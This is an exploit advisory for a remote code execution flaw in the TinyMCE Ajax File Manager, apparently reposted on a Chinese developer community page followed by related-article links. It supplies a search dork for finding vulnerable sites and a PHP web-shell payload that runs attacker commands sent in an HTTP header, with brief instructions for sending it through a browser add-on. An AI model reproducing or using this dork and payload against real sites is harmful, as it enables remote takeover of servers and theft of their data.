____ ____ ____ _______/ |________ ____ ____
/ _ \ / \_/ __ \ / ___/\ __\_ __ \_/ __ \_/ __ \
( <_> ) | \ ___/ \___ \ | | | | \/\ ___/\ ___/
\____/|___| /\___ >____ > |_ | |__| \___ >\___ >
\/ \/ \/ \/ \/
# Exploit Title : timynce Ajax File Manager Remote Code
# Author : By onestree
# Software Link : http://www.phpletter.com/Demo/Tinymce-Ajax-File-Manager/
# tested : windows 7
# Dork : inurl:"/plugins/filemanager/" or inurl:'/timynce/plugins/"
*************************************************************
how to run the exploit use firefox web browser
and download firefox add ons HackBar
exploit :
foo=<?php error_reporting(0);print(system('onestree'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>
====================================================================
tutorial video
https://www.youtube.com/watch?v=ahli-dehYWY
Thanks :
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder
spesial my hunny ( Fheby Yahya) :* muaaah
TinyMCE Ajax File Manager suffers from a remote code execution vulnerability.
2013-05-09
974
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《
阿里云开发者社区用户服务协议》和
《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写
侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:
____ ____ ____ _______/ |________ ____ ____ / _ \ / \_/ __ \ / ___/\ __\_ ...
目录
相关文章
|
PHP
|
前端开发
ajax 通过move_uploaded_file函数上传图片获取$_FILES['file']对象的属性内容
ajax 通过move_uploaded_file函数上传图片获取$_FILES['file']对象的属性内容
96
0
0
|
XML
JSON
前端开发
|
XML
前端开发
JavaScript
|
JSON
前端开发
Java
利用Spring Boot处理JSON数据实战(包括jQuery,html,ajax)附源码 超详细
利用Spring Boot处理JSON数据实战(包括jQuery,html,ajax)附源码 超详细
387
0
0
|
敏捷开发
JavaScript
前端开发
❤❤❤【Vue.js最新版】sd.js基于jQuery Ajax最新原生完整版for凯哥API版本❤❤❤
❤❤❤【Vue.js最新版】sd.js基于jQuery Ajax最新原生完整版for凯哥API版本❤❤❤
148
0
0
|
前端开发
JavaScript
![杨校老师课堂之基于Servlet整合JQuery中的Ajax进行表单提交[基于IDEA]](https://ucc.alicdn.com/pic/developer-ecology/xsqfoqm5pyibg_09d05e48e8364b9588701e9347609934.gif)
|
JavaScript
前端开发
安全
安全开发-JS应用&原生开发&JQuery库&Ajax技术&加密编码库&断点调试&逆向分析&元素属性操作
安全开发-JS应用&原生开发&JQuery库&Ajax技术&加密编码库&断点调试&逆向分析&元素属性操作
121
5
5
|
XML
JSON
前端开发
|
JavaScript
前端开发
热门文章
最新文章
1
处理动态Token:Python爬虫应对AJAX授权请求的策略
2
Jquery利用ajax调用asp.net webservice的各种数据类型(总结篇)
3
Ajax无刷新分页源码--未使用分页控件
4
培训讲义--俄罗斯方块--AJAX Training(03_01)
5
使用jquery+json实现ajax的方法
6
vs 2008中使用Asp.net Ajax智能感知Intellisense
7
动态调用数据的AJAX+JQuery方法
8
曾经的代码系列——AJAX和JSON生成下拉列表框
9
解决ajax跨域问题的一种方法
10
ajax中post提交form所有元素序列化提交方法.serialize();